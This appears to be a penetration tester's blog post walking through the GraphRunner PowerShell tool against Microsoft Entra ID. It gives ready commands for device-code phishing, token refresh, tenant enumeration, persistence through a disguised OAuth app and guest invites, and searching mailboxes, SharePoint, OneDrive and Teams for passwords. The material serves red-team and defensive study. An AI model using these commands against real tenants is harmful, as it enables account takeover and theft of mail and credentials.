Microsoft Entra ID (Azure AD) Penetration Test/Red Team Assessment All-in-One Tool
I have written about Microsoft Entra ID (Azure AD) Penetration/Red Team before. But in this blog, I will try to tell you about a single tool that can be used as an all-in-one tool in Microsoft Entra ID (Azure AD) assessments. It has made my work very easy on the tests. Without further ado, let me introduce the tool.
The tool's name is Graphrunner.
In the past, I was using AADInternals, RoadTools, and TokenTactics to access files in MS Teams, Outlook, and OneDrive during pentest/red team. But sometimes when I was switching between tokens, I would forget which token I was in and I had a hard time remembering which phase I was in. This caused me to recreate the tokens, be more noisy, and create more logs in the target system.
Lately, I discovered the GraphRunner tool, developed by Black Hills Information Security, which made my work much easier. Although it is called a post-exploitation tool, I think the tool can be used from the beginning to the end of the assessment.
Creating device code for phishing attacks can be done through the tool too. So let’s start with the explanation of the tool and how it can be used.
First of all, the tool includes a PowerShell module, so you need a Windows machine. You can create a Windows instance in the cloud for this. I use mostly cloud systems for these assessments but you don’t necessarily need it, you can work comfortably on the host too.
You need to download the tool from GitHub to your Windows machine and then install it via PowerShell.
Import-Module .\GraphRunner.ps1The tool consists of some submodules. These are :
- Authentication,
- Recon & Enumeration Modules,
- Persistence Modules,
- Pillage Modules,
- Invoke-GraphRunner Module(More Automation),
- Supplemental Modules.
I only want to write about certain aspects of it, both to keep the blog shorter and to explain the aspects I use myself. You can already see and apply the other uses on the usage wiki page.
Like also with AADInternal you need to get the device code from Microsoft Endpoint and send it to Scope(mostly via a phishing email or if it is not in scope with the test user you can implement.). So that phase is Initial Access.
Get-GraphTokensSo it will give you a Device Code that should be used via a valid user account. After that, you will have a PRT Token which is important during your Penetration Test/Red Team Assessment.
During your assessment, your tokens (victim tokens) will be expired. To use and connect Entra ID you should renew them. That can be done via Invoke-RefreshGraphTokens.
Invoke-RefreshGraphTokens Here you should give TenantID and your Refresh Token as input.
So now we are in the system and can stay as much as we want.
After that, you can do Enumeration in the system. GraphRunner here gives you lots of flexibility I have used some of them. Here I will give you some of them.
Invoke-GraphRecon -Tokens $tokens -PermissionEnum
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
Invoke-DumpApps -Tokens $tokens
Get-AzureADUsers -Tokens $tokens -OutFile users.txt
Get-SecurityGroups -AccessToken $tokens.access_token
Get-UpdatableGroups -Tokens $tokens
Get-DynamicGroups -Tokens $tokens
Get-SharePointSiteURLs -Tokens $tokens
Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt
Get-TenantID -Domain Mostly on that module, I have used enumerating updatable groups. Because it means that I can add my victim user in these groups with its privileges and search for more passwords or secret files in these teams' chat/outlook and OneDrive files.
Next comes Persistence in the system, so here you have some options, you can add guest users to the system or you can add your victim user to some groups. Also, it is possible to create a clone group with the exact name of the security groups and wait for the global admin mistake to give extra privileges to that fake group.
These commands;
Invoke-InjectOAuthApp -AppName "Win Defend for M365" -ReplyUrl "https://windefend.azurewebsites.net" -scope "openid","Mail.Read","email","profile","offline_access" -Tokens $tokens
Invoke-SecurityGroupCloner -Tokens $tokens
Invoke-InviteGuest -Tokens $tokens -DisplayName "Lord Voldemort" -EmailAddress "iamlordvoldemort@31337schoolofhackingandwizardry.com"
Invoke-AddGroupMember -Tokens $tokens -groupID e6a413c2-2aa4-4a80-9c16-88c1687f57d9 -userId 7a3d8bfe-e4c7-46c0-93ec-ef2b1c8a0b4aHere I mostly use Invoke-AddGroupMember and Invoke-InviteGuest commands. First I check for updatable groups by victim privileges and then if there are some interesting groups that I can be part of I add my victim user to these groups and check these groups' privileges or other loots for the next steps.
After these I go over with Pillage module, here you can search the Mailbox of the victim, SharePoint and OneDrive files, and loots in Teams messages.
Commands that you can use here are:
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password AND filetype:xlsx'
Invoke-ImmersiveFileReader -Tokens $tokens -SharePointDomain targetcompany.sharepoint.com -DriveID <drive ID> -FileID <FileID>
Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"
Get-Inbox -Tokens $tokens -userid deckard@tyrellcorporation.io -TotalMessages 50 -OutFile emails.csv
Get-TeamsChat -Tokens $tokens On that part, I want to give some attack paths which can be useful in your assessment.
I would like to thank dafthack and Black Hills InfoSec team for that great tool.
You can follow me from here:
- https://github.com/mturhanlar
- https://github.com/mturhanlar/turme
- https://www.linkedin.com/in/melihturhanlar/
References:
